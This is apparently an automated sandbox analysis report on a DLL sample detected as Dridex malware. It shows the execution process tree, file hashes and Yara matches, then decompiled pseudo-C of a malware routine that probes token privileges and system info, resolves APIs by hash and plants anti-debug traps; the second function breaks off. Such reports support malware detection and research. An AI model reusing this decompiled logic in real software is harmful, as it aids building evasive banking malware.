Commandline:	loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll"
Imagebase:	0x8b0000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000002.654367413.000000006E831000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6328 Parent PID: 6296

General

Start time:	20:03:56
Start date:	22/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll",#1
Imagebase:	0x870000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6368 Parent PID: 6328

General

Start time:	20:03:56
Start date:	22/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware1.4295.dll",#1
Imagebase:	0xb80000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000000.263879217.000000006E831000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000002.303178231.000000006E831000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000000.261899992.000000006E831000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 6564 Parent PID: 6368

General

Start time:	20:04:00
Start date:	22/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6368 -s 684
Imagebase:	0xc30000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 6296 Parent PID: 1988 loaddll32.exeCOMMON

Executed Functions

Function 6E840730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E6E840730(void* __ecx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t155;
				signed char* _t159;
				char _t162;
				void* _t180;
				intOrPtr _t189;
				char _t190;
				intOrPtr _t196;
				intOrPtr _t200;
				void* _t203;
				void* _t212;
				void* _t213;
				void* _t215;
				void* _t216;
				void* _t223;
				void* _t238;
				void* _t241;
				void* _t244;
				void* _t247;
				void* _t250;
				void* _t254;
				void* _t259;
				void* _t265;
				void* _t268;
				int _t271;
				void* _t272;
				void* _t276;
				void* _t277;
				void* _t278;
				void* _t282;
				int _t288;
				intOrPtr* _t291;
				signed char _t294;
				signed char _t295;
				intOrPtr* _t320;
				intOrPtr* _t325;
				intOrPtr* _t363;
				char _t364;
				intOrPtr* _t372;
				void* _t377;
				void* _t382;
				void* _t383;
				void* _t384;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t393;
				void* _t395;
				void* _t401;
				void* _t403;
				intOrPtr* _t404;
				signed int _t406;
				intOrPtr* _t409;
				void* _t411;
				signed int _t413;
				void* _t414;
				void* _t415;
				void* _t420;
				intOrPtr* _t423;
				void* _t425;
				void** _t427;
				void* _t428;
				void* _t429;

				_t414 = __ecx;
				_t155 =  *0x6e84d1f8;
				if(_t155 == 0x4c71e88d) {
					_t155 = E6E84361C(0x30);
					 *0x6e84d1f8 = _t155;
				}
				if( *((char*)(_t155 + 0xb)) == 0 || _t414 != 0) {
					_t415 = _t428 + 0x48;
					E6E843698(_t415, 0, 0x11c);
					_t429 = _t428 + 0xc;
					 *((intOrPtr*)(_t429 + 0x48)) = 0x11c;
					if(E6E84306C(0x8e844d1e, 0xcf311107, 0x8e844d1e, 0x8e844d1e) != 0) {
						_push(_t415);
						asm("int3");
						asm("int3");
					}
					_t404 =  *0x6e84d1f8;
					_t159 = _t429 + 0x4c;
					_t294 =  *_t159;
					 *(_t404 + 8) = _t294;
					_t295 = _t159[4];
					 *(_t404 + 9) = _t295;
					 *((char*)(_t404 + 0xa)) = _t159[0x110];
					 *((intOrPtr*)(_t404 + 4)) =  *((intOrPtr*)(_t429 + 0x54));
					 *((char*)(_t404 + 0xc)) = 0 | _t159[0x116] != 0x00000001;
					 *_t404 = (_t295 & 0x000000ff) + ((_t294 & 0x000000ff) << 4) - 0x50;
					_t162 = E6E840FF8(_t404);
					 *(_t429 + 0x198) = 0;
					 *((char*)( *0x6e84d1f8 + 0xb)) = _t162;
					_t363 = E6E84306C(0x150c05fc, 0x1da4d409, _t162, _t162);
					if(_t363 == 0) {
						L12:
						_t364 = 0;
						L13:
						 *((char*)( *0x6e84d1f8 + 0x28)) = _t364;
						if( *((intOrPtr*)(E6E840730(0))) >= 0x10) {
							_push(6);
							memcpy(_t429 + 0x164, 0x6e84bce0, 0 << 2);
							_t429 = _t429 + 0xc;
							 *((intOrPtr*)(_t429 + 0x1c)) = 0;
							E6E83F584(_t429 + 0x24, 0);
							_t406 = 0;
							__eflags = 0;
							do {
								E6E83F828(_t429 + 0x24, E6E83F4CC(_t429 + 0x20) + 4);
								 *((intOrPtr*)(E6E83F4BC(_t429 + 0x24, E6E83F4CC(_t429 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t429 + 0x164 + _t406 * 4));
								_t406 = _t406 + 1;
								 *((intOrPtr*)(_t429 + 0x1c)) =  *((intOrPtr*)(_t429 + 0x1c)) + 1;
								__eflags = _t406 - 6;
							} while (_t406 < 6);
							_push(0);
							E6E845580(_t429 + 0xc, _t429 + 0x1c, 0x80000002);
							E6E83F654(_t429 + 0x20);
							E6E8455B0(_t429 + 8, _t429 + 0x1c0, 0xc0092a94);
							_t180 = E6E845864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c0)));
							_t407 = _t180;
							E6E83DFA4(_t429 + 0x1c0);
							__eflags = _t180;
							if(_t180 != 0) {
								E6E8455B0(_t429 + 8, _t429 + 0x1c8, 0x1e55aaec);
								_t420 = E6E845864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c8)));
								E6E83DFA4(_t429 + 0x1c8);
								_t407 = _t429 + 0x1d0;
								E6E8455B0(_t429 + 8, _t429 + 0x1d0, 0x360d0c74);
								_t401 = E6E845864(_t429 + 4, __eflags,  *(_t429 + 0x1d0));
								E6E83DFA4(_t429 + 0x1d0);
								__eflags = _t420;
								if(_t420 != 0) {
									__eflags = _t420 - 5;
									if(_t420 != 5) {
										__eflags = _t420 - 2;
										if(_t420 != 2) {
											L58:
											E6E83CFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L65:
												_t189 = 0;
												__eflags = 0;
												 *(_t429 + 4) = 0;
												goto L66;
											}
											_t382 =  *(_t429 + 4);
											__eflags = _t382;
											if(_t382 == 0) {
												L61:
												_t238 = 1;
												L63:
												__eflags = _t238;
												if(_t238 == 0) {
													E6E845558(_t382);
												}
												goto L65;
											}
											__eflags = _t382 - 0xffffffff;
											if(_t382 != 0xffffffff) {
												_t238 = 0;
												__eflags = 0;
												goto L63;
											}
											goto L61;
										}
										__eflags = _t401 - 1;
										if(_t401 != 1) {
											goto L58;
										}
										E6E83CFDC(_t429 + 0xc);
										__eflags =  *((char*)(_t429 + 8));
										if( *((char*)(_t429 + 8)) == 0) {
											L57:
											 *(_t429 + 4) = 0;
											_t189 = 5;
											goto L66;
										}
										_t383 =  *(_t429 + 4);
										__eflags = _t383;
										if(_t383 == 0) {
											L53:
											_t241 = 1;
											L55:
											__eflags = _t241;
											if(_t241 == 0) {
												E6E845558(_t383);
											}
											goto L57;
										}
										__eflags = _t383 - 0xffffffff;
										if(_t383 != 0xffffffff) {
											_t241 = 0;
											__eflags = 0;
											goto L55;
										}
										goto L53;
									}
									__eflags = _t401;
									if(_t401 != 0) {
										__eflags = _t401 - 1;
										if(_t401 == 1) {
											E6E83CFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L121:
												 *(_t429 + 4) = 0;
												_t189 = 4;
												goto L66;
											}
											_t384 =  *(_t429 + 4);
											__eflags = _t384;
											if(_t384 == 0) {
												L117:
												_t244 = 1;
												L119:
												__eflags = _t244;
												if(_t244 == 0) {
													E6E845558(_t384);
												}
												goto L121;
											}
											__eflags = _t384 - 0xffffffff;
											if(_t384 != 0xffffffff) {
												_t244 = 0;
												__eflags = 0;
												goto L119;
											}
											goto L117;
										}
										goto L58;
									}
									E6E83CFDC(_t429 + 0xc);
									__eflags =  *((char*)(_t429 + 8));
									if( *((char*)(_t429 + 8)) == 0) {
										L45:
										 *(_t429 + 4) = 0;
										_t189 = 3;
										goto L66;
									}
									_t385 =  *(_t429 + 4);
									__eflags = _t385;
									if(_t385 == 0) {
										L41:
										_t247 = 1;
										L43:
										__eflags = _t247;
										if(_t247 == 0) {
											E6E845558(_t385);
										}
										goto L45;
									}
									__eflags = _t385 - 0xffffffff;
									if(_t385 != 0xffffffff) {
										_t247 = 0;
										__eflags = 0;
										goto L43;
									}
									goto L41;
								}
								__eflags = _t401;
								if(_t401 != 0) {
									goto L58;
								}
								E6E83CFDC(_t429 + 0xc);
								__eflags =  *((char*)(_t429 + 8));
								if( *((char*)(_t429 + 8)) == 0) {
									L35:
									 *(_t429 + 4) = 0;
									_t189 = 2;
									goto L66;
								}
								_t386 =  *(_t429 + 4);
								__eflags = _t386;
								if(_t386 == 0) {
									L31:
									_t250 = 1;
									L33:
									__eflags = _t250;
									if(_t250 == 0) {
										E6E845558(_t386);
									}
									goto L35;
								}
								__eflags = _t386 - 0xffffffff;
								if(_t386 != 0xffffffff) {
									_t250 = 0;
									__eflags = 0;
									goto L33;
								}
								goto L31;
							}
							E6E83CFDC(_t429 + 0xc);
							__eflags =  *((char*)(_t429 + 8));
							if( *((char*)(_t429 + 8)) == 0) {
								L25:
								 *(_t429 + 4) = 0;
								_t189 = 1;
								goto L66;
							}
							_t387 =  *(_t429 + 4);
							__eflags = _t387;
							if(_t387 == 0) {
								L21:
								_t254 = 1;
								L23:
								__eflags = _t254;
								if(_t254 == 0) {
									E6E845558(_t387);
								}
								goto L25;
							}
							__eflags = _t387 - 0xffffffff;
							if(_t387 != 0xffffffff) {
								_t254 = 0;
								__eflags = 0;
								goto L23;
							}
							goto L21;
						} else {
							_t189 = 1;
							L66:
							 *((intOrPtr*)( *0x6e84d1f8 + 0x24)) = _t189;
							_t190 = E6E841030(0xffffffffffffffff);
							_t320 =  *0x6e84d1f8;
							 *((char*)(_t320 + 0x29)) = _t190;
							 *((intOrPtr*)(_t320 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t320 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x6e84d1f8 + 0x2c)) = E6E8410A4(0x6e84d1f8, 0xffffffffffffffff);
								L78:
								if(E6E84306C(0x8e844d1e, 0x925d7fea, 0x8e844d1e, 0x8e844d1e) != 0) {
									GetSystemInfo(_t429 + 0x164); // executed
								}
								_t196 =  *0x6e84d1f8;
								_t291 = _t429 + 0x178;
								_t409 = _t429 + 0x170;
								 *((short*)(_t196 + 0xe)) =  *_t291;
								 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t291 - 0x10));
								 *((intOrPtr*)(_t196 + 0x14)) =  *((intOrPtr*)(_t291 - 0xc));
								 *((intOrPtr*)(_t196 + 0x18)) =  *_t409;
								 *((intOrPtr*)(_t196 + 0x1c)) =  *((intOrPtr*)(_t409 + 0x10));
								return _t196;
							}
							 *(_t429 + 0x19c) = 0;
							_t372 = E6E84306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
							if(_t372 == 0) {
								L74:
								_t200 =  *0x6e84d1f8;
								if( *((char*)(_t200 + 0x28)) == 0) {
									 *((intOrPtr*)(_t200 + 0x2c)) = 3;
								} else {
									 *((intOrPtr*)(_t200 + 0x2c)) = 5;
								}
								goto L78;
							}
							_push(_t429 + 0x19c);
							_push(8);
							_push(0xffffffff);
							if( *_t372() == 0) {
								_t203 = E6E8435F0(_t407);
								__eflags = _t203;
								if(_t203 != 0) {
									goto L74;
								}
							}
							 *(_t429 + 0x30) =  *(_t429 + 0x19c);
							 *((char*)(_t429 + 0x34)) = 1;
							 *(_t429 + 0x1a4) = 0;
							_t325 = E6E84306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
							if(_t325 != 0) {
								_push(_t429 + 0x1a4);
								_push(0);
								_push(0);
								_push(1);
								_push( *(_t429 + 0x1ac));
								if( *_t325() == 0) {
									E6E8435F0(_t407);
								}
							}
							_t206 =  *(_t429 + 0x1a4);
							if( *(_t429 + 0x1a4) != 0) {
								E6E83F584(_t429 + 0x18c, _t206);
								_t411 = E6E84306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
								__eflags = _t411;
								if(_t411 == 0) {
									L133:
									E6E83F654(_t429 + 0x188);
									goto L72;
								}
								_t212 = E6E83F4BC(_t429 + 0x18c, 0);
								_t213 = E6E83F4CC(_t429 + 0x188);
								_t215 =  *_t411( *(_t429 + 0x1ac), 1, _t212, _t213, _t429 + 0x1a4);
								__eflags = _t215;
								if(_t215 == 0) {
									_t216 = E6E8435F0(_t411);
									__eflags = _t216;
									if(_t216 != 0) {
										goto L133;
									}
								}
								_t423 = E6E83F4BC(_t429 + 0x18c, 0);
								E6E83DF4C(_t429 + 0x1b4, 0);
								 *(_t429 + 0x1ac) = 0;
								_t377 = E6E84306C(0x150c05fc, 0xfc1a24a1, 0x150c05fc, 0x150c05fc);
								__eflags = _t377;
								if(_t377 != 0) {
									 *_t377( *_t423, _t429 + 0x1ac);
								}
								E6E83DFC0(_t429 + 0x1b4,  *(_t429 + 0x1ac));
								_t223 = E6E84306C(0x8e844d1e, 0xda6a2597, 0x8e844d1e, 0x8e844d1e);
								__eflags = _t223;
								if(_t223 != 0) {
									_push( *(_t429 + 0x1ac));
									asm("int3");
									asm("int3");
								}
								E6E83E06C(_t429 + 0x1b8 - 8, _t429 + 0x1b8);
								_t425 = E6E844FFC( *((intOrPtr*)(_t429 + 0x1b8)), E6E83E8A8( *((intOrPtr*)(_t429 + 0x1b8)), 0x7fffffff));
								E6E83DFA4(_t429 + 0x1b8);
								E6E83DFA4(_t429 + 0x1b0);
								E6E83F654(_t429 + 0x188);
								__eflags =  *((char*)(_t429 + 0x34));
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6E83BB44(_t429 + 0x30);
								}
								__eflags = _t425 - 0x6df4cf7;
								if(_t425 != 0x6df4cf7) {
									goto L74;
								} else {
									 *((intOrPtr*)( *0x6e84d1f8 + 0x2c)) = 6;
									goto L78;
								}
							} else {
								L72:
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6E83BB44(_t429 + 0x30);
								}
								goto L74;
							}
						}
					}
					_push(_t429 + 0x198);
					_push(8);
					_push(0xffffffff);
					if( *_t363() == 0) {
						_t259 = E6E8435F0(_t404);
						__eflags = _t259;
						if(_t259 != 0) {
							goto L12;
						}
					}
					 *(_t429 + 0x14) =  *(_t429 + 0x198);
					 *((char*)(_t429 + 0x18)) = 1;
					 *(_t429 + 0x1a0) = 0;
					if(E6E84306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
						_t288 = GetTokenInformation( *(_t429 + 0x1a8), 2, 0, 0, _t429 + 0x1a0); // executed
						if(_t288 == 0) {
							E6E8435F0(_t404);
						}
					}
					_t262 =  *(_t429 + 0x1a0);
					if( *(_t429 + 0x1a0) != 0) {
						E6E83F584(_t429 + 0x3c, _t262);
						_t265 = E6E84306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
						_t407 = _t265;
						__eflags = _t265;
						if(_t265 == 0) {
							L107:
							E6E83F654(_t429 + 0x38);
							goto L10;
						}
						_t268 = E6E83F4BC(_t429 + 0x3c, 0);
						_t271 = GetTokenInformation( *(_t429 + 0x1a8), 2, _t268, E6E83F4CC(_t429 + 0x38), _t429 + 0x1a0); // executed
						__eflags = _t271;
						if(_t271 == 0) {
							_t272 = E6E8435F0(_t407);
							__eflags = _t272;
							if(_t272 != 0) {
								goto L107;
							}
						}
						_t427 = E6E83F4BC(_t429 + 0x3c, 0);
						 *(_t429 + 0x1d8 - 0x30) = 0;
						asm("movsd");
						asm("movsb");
						asm("movsb");
						_t407 = E6E84306C(0x150c05fc, 0x2351aaca, 0x150c05fc, 0x150c05fc);
						__eflags = _t407;
						if(_t407 == 0) {
							goto L107;
						}
						_t276 = _t429 + 0x1a8;
						_t277 =  *_t407(_t276 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t276);
						__eflags = _t277;
						if(_t277 == 0) {
							_t278 = E6E8435F0(_t407);
							__eflags = _t278;
							if(_t278 != 0) {
								goto L107;
							}
						}
						_t403 =  *(_t429 + 0x1a8);
						__eflags =  *_t427;
						if( *_t427 <= 0) {
							L101:
							__eflags = _t403;
							if(_t403 == 0) {
								L103:
								_t393 = 1;
								L105:
								__eflags = _t393;
								if(_t393 == 0) {
									E6E840FD4(_t403, _t407, _t403);
								}
								goto L107;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t393 = 0;
								__eflags = 0;
								goto L105;
							}
							goto L103;
						}
						_t413 = 0;
						__eflags = 0;
						do {
							_t282 = E6E84306C(0x150c05fc, 0xb4757511, 0x150c05fc, 0x150c05fc);
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							_push( *((intOrPtr*)(_t427 + 4 + _t413 * 8)));
							_push( *(_t429 + 0x1ac));
							asm("int3");
							asm("int3");
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							__eflags = _t403;
							if(_t403 == 0) {
								L93:
								_t395 = 1;
								L95:
								__eflags = _t395;
								if(_t395 == 0) {
									E6E840FD4(_t403, _t413, _t403);
								}
								E6E83F654(_t429 + 0x38);
								__eflags =  *((char*)(_t429 + 0x18));
								if( *((char*)(_t429 + 0x18)) != 0) {
									E6E83BB44(_t429 + 0x14);
								}
								_t364 = 1;
								goto L13;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t395 = 0;
								__eflags = 0;
								goto L95;
							}
							goto L93;
							L100:
							_t413 = _t413 + 1;
							__eflags = _t413 -  *_t427;
						} while (_t413 <  *_t427);
						goto L101;
					}
					L10:
					if( *((char*)(_t429 + 0x18)) != 0) {
						E6E83BB44(_t429 + 0x14);
					}
					goto L12;
				} else {
					return _t155;
				}
			}

0x6e84073f
0x6e840741
0x6e840748
0x6e840fc7
0x6e840fcd
0x6e840fcd
0x6e840752
0x6e84075e
0x6e84076a
0x6e84076f
0x6e84077c
0x6e84078d
0x6e84078f
0x6e840790
0x6e840791
0x6e840791
0x6e840792
0x6e840796
0x6e84079a
0x6e84079f
0x6e8407a2
0x6e8407a8
0x6e8407c2
0x6e8407c9
0x6e8407cc
0x6e8407cf
0x6e8407d1
0x6e8407dd
0x6e8407ea
0x6e8407f7
0x6e8407fb
0x6e840887
0x6e840887
0x6e840889
0x6e84088d
0x6e840898
0x6e8408ae
0x6e8408b1
0x6e8408b1
0x6e8408b5
0x6e8408be
0x6e8408c3
0x6e8408c3
0x6e8408c5
0x6e8408d6
0x6e8408f8
0x6e8408fa
0x6e8408fb
0x6e8408ff
0x6e8408ff
0x6e840908
0x6e840914
0x6e84091d
0x6e840933
0x6e840943
0x6e840948
0x6e84094c
0x6e840951
0x6e840953
0x6e8409a3
0x6e8409b8
0x6e8409bc
0x6e8409c1
0x6e8409d2
0x6e8409e7
0x6e8409eb
0x6e8409f0
0x6e8409f2
0x6e840a39
0x6e840a3c
0x6e840a8a
0x6e840a8d
0x6e840ace
0x6e840ad2
0x6e840ad7
0x6e840adc
0x6e840afb
0x6e840afb
0x6e840afb
0x6e840afd
0x00000000
0x6e840afd
0x6e840ade
0x6e840ae2
0x6e840ae4
0x6e840aeb
0x6e840aeb
0x6e840af1
0x6e840af1
0x6e840af3
0x6e840af6
0x6e840af6
0x00000000
0x6e840af3
0x6e840ae6
0x6e840ae9
0x6e840aef
0x6e840aef
0x00000000
0x6e840aef
0x00000000
0x6e840ae9
0x6e840a8f
0x6e840a92
0x00000000
0x00000000
0x6e840a98
0x6e840a9d
0x6e840aa2
0x6e840ac1
0x6e840ac1
0x6e840acb
0x00000000
0x6e840acb
0x6e840aa4
0x6e840aa8
0x6e840aaa
0x6e840ab1
0x6e840ab1
0x6e840ab7
0x6e840ab7
0x6e840ab9
0x6e840abc
0x6e840abc
0x00000000
0x6e840ab9
0x6e840aac
0x6e840aaf
0x6e840ab5
0x6e840ab5
0x00000000
0x6e840ab5
0x00000000
0x6e840aaf
0x6e840a3e
0x6e840a40
0x6e840a7f
0x6e840a82
0x6e840df4
0x6e840df9
0x6e840dfe
0x6e840e1d
0x6e840e1d
0x6e840e27
0x00000000
0x6e840e27
0x6e840e00
0x6e840e04
0x6e840e06
0x6e840e0d
0x6e840e0d
0x6e840e13
0x6e840e13
0x6e840e15
0x6e840e18
0x6e840e18
0x00000000
0x6e840e15
0x6e840e08
0x6e840e0b
0x6e840e11
0x6e840e11
0x00000000
0x6e840e11
0x00000000
0x6e840e0b
0x00000000
0x6e840a88
0x6e840a46
0x6e840a4b
0x6e840a50
0x6e840a6f
0x6e840a6f
0x6e840a79
0x00000000
0x6e840a79
0x6e840a52
0x6e840a56
0x6e840a58
0x6e840a5f
0x6e840a5f
0x6e840a65
0x6e840a65
0x6e840a67
0x6e840a6a
0x6e840a6a
0x00000000
0x6e840a67
0x6e840a5a
0x6e840a5d
0x6e840a63
0x6e840a63
0x00000000
0x6e840a63
0x00000000
0x6e840a5d
0x6e8409f4
0x6e8409f6
0x00000000
0x00000000
0x6e840a00
0x6e840a05
0x6e840a0a
0x6e840a29
0x6e840a29
0x6e840a33
0x00000000
0x6e840a33
0x6e840a0c
0x6e840a10
0x6e840a12
0x6e840a19
0x6e840a19
0x6e840a1f
0x6e840a1f
0x6e840a21
0x6e840a24
0x6e840a24
0x00000000
0x6e840a21
0x6e840a14
0x6e840a17
0x6e840a1d
0x6e840a1d
0x00000000
0x6e840a1d
0x00000000
0x6e840a17
0x6e840959
0x6e84095e
0x6e840963
0x6e840982
0x6e840982
0x6e84098c
0x00000000
0x6e84098c
0x6e840965
0x6e840969
0x6e84096b
0x6e840972
0x6e840972
0x6e840978
0x6e840978
0x6e84097a
0x6e84097d
0x6e84097d
0x00000000
0x6e84097a
0x6e84096d
0x6e840970
0x6e840976
0x6e840976
0x00000000
0x6e840976
0x00000000
0x6e84089a
0x6e84089c
0x6e840b01
0x6e840b06
0x6e840b09
0x6e840b0e
0x6e840b10
0x6e840b25
0x6e840b28
0x6e840bf6
0x6e840bfe
0x6e840c01
0x6e840c16
0x6e840c20
0x6e840c20
0x6e840c22
0x6e840c24
0x6e840c33
0x6e840c3f
0x6e840c43
0x6e840c46
0x6e840c49
0x6e840c4c
0x00000000
0x6e840c4c
0x6e840b38
0x6e840b4a
0x6e840b4e
0x6e840bda
0x6e840bda
0x6e840be0
0x6e840beb
0x6e840be2
0x6e840be2
0x6e840be2
0x00000000
0x6e840be0
0x6e840b5b
0x6e840b5c
0x6e840b5e
0x6e840b64
0x6e840fb3
0x6e840fb8
0x6e840fba
0x00000000
0x00000000
0x6e840fc0
0x6e840b7b
0x6e840b7f
0x6e840b84
0x6e840b96
0x6e840b9a
0x6e840ba5
0x6e840ba6
0x6e840ba7
0x6e840ba8
0x6e840baa
0x6e840bb5
0x6e840e2d
0x6e840e2d
0x6e840bb5
0x6e840bbb
0x6e840bc4
0x6e840e3f
0x6e840e55
0x6e840e57
0x6e840e59
0x6e840f94
0x6e840f9b
0x00000000
0x6e840f9b
0x6e840e68
0x6e840e76
0x6e840e90
0x6e840e92
0x6e840e94
0x6e840fa5
0x6e840faa
0x6e840fac
0x00000000
0x00000000
0x6e840fae
0x6e840ea8
0x6e840eb3
0x6e840ec2
0x6e840ed4
0x6e840ed6
0x6e840ed8
0x6e840ee5
0x6e840ee5
0x6e840ef5
0x6e840f06
0x6e840f0b
0x6e840f0d
0x6e840f0f
0x6e840f16
0x6e840f17
0x6e840f17
0x6e840f23
0x6e840f44
0x6e840f4d
0x6e840f59
0x6e840f65
0x6e840f6a
0x6e840f6f
0x6e840f75
0x6e840f75
0x6e840f7a
0x6e840f80
0x00000000
0x6e840f86
0x6e840f88
0x00000000
0x6e840f88
0x6e840bca
0x6e840bca
0x6e840bcf
0x6e840bd5
0x6e840bd5
0x00000000
0x6e840bcf
0x6e840bc4
0x6e840898
0x6e840808
0x6e840809
0x6e84080b
0x6e840811
0x6e840dde
0x6e840de3
0x6e840de5
0x00000000
0x00000000
0x6e840deb
0x6e840828
0x6e84082c
0x6e840831
0x6e840847
0x6e84085e
0x6e840862
0x6e840c5a
0x6e840c5a
0x6e840862
0x6e840868
0x6e840871
0x6e840c69
0x6e840c7a
0x6e840c7f
0x6e840c81
0x6e840c83
0x6e840db4
0x6e840db8
0x00000000
0x6e840db8
0x6e840c8f
0x6e840cb4
0x6e840cb6
0x6e840cb8
0x6e840dd0
0x6e840dd5
0x6e840dd7
0x00000000
0x00000000
0x6e840dd9
0x6e840cc9
0x6e840cd7
0x6e840cde
0x6e840cdf
0x6e840ce0
0x6e840cf2
0x6e840cf4
0x6e840cf6
0x00000000
0x00000000
0x6e840cfe
0x6e840d19
0x6e840d1b
0x6e840d1d
0x6e840dc2
0x6e840dc7
0x6e840dc9
0x00000000
0x00000000
0x6e840dcb
0x6e840d23
0x6e840d2a
0x6e840d2e
0x6e840d99
0x6e840d99
0x6e840d9b
0x6e840da2
0x6e840da2
0x6e840da8
0x6e840da8
0x6e840daa
0x6e840daf
0x6e840daf
0x00000000
0x6e840daa
0x6e840d9d
0x6e840da0
0x6e840da6
0x6e840da6
0x00000000
0x6e840da6
0x00000000
0x6e840da0
0x6e840d30
0x6e840d30
0x6e840d32
0x6e840d3e
0x6e840d43
0x6e840d45
0x00000000
0x00000000
0x6e840d47
0x6e840d4b
0x6e840d52
0x6e840d53
0x6e840d54
0x6e840d56
0x00000000
0x00000000
0x6e840d58
0x6e840d5a
0x6e840d61
0x6e840d61
0x6e840d67
0x6e840d67
0x6e840d69
0x6e840d6e
0x6e840d6e
0x6e840d77
0x6e840d7c
0x6e840d81
0x6e840d87
0x6e840d87
0x6e840d8c
0x00000000
0x6e840d8c
0x6e840d5c
0x6e840d5f
0x6e840d65
0x6e840d65
0x00000000
0x6e840d65
0x00000000
0x6e840d93
0x6e840d93
0x6e840d94
0x6e840d94
0x00000000
0x6e840d32
0x6e840877
0x6e84087c
0x6e840882
0x6e840882
0x00000000
0x6e840c59
0x6e840c59
0x6e840c59

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,150C05FC,150C05FC), ref: 6E84085E
GetSystemInfo.KERNELBASE(?,8E844D1E,8E844D1E,?,?,360D0C74,?,?,1E55AAEC,?,?,C0092A94,00000000,80000002,00000000,-000000FC), ref: 6E840C20
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,150C05FC,150C05FC,00000000,150C05FC,150C05FC), ref: 6E840CB4

Memory Dump Source

Source File: 00000000.00000002.654367413.000000006E831000.00000020.00020000.sdmp, Offset: 6E830000, based on PE: true

Associated: 00000000.00000002.654343505.000000006E830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654475351.000000006E84A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.654519889.000000006E84D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.654546323.000000006E84F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$InfoSystem
String ID:
API String ID: 298373132-0
Opcode ID: e644a7c9948bd89145e0c7c23791375bb90e2febac5567a7466b9b52c9f60460
Instruction ID: d056c3282444ff14d845ba35cf6ebf9a18b598455ee988eb093e1244a32611e4
Opcode Fuzzy Hash: e644a7c9948bd89145e0c7c23791375bb90e2febac5567a7466b9b52c9f60460
Instruction Fuzzy Hash: 4022B170648349EFE761DBE8C850BDB77A9EFA1308F108D18A994972D5EB30D905CB93

Uniqueness

Uniqueness Score: -1.00%

Function 6E842234, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E6E842234(void* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr* _t5;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t15;

				_t11 = __edx;
				if(__ecx == 0) {
					 *_t15 = 0;
					_v4 = 0;
				} else {
					 *_t15 = E6E843AF8(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v20 = _t11;
				}
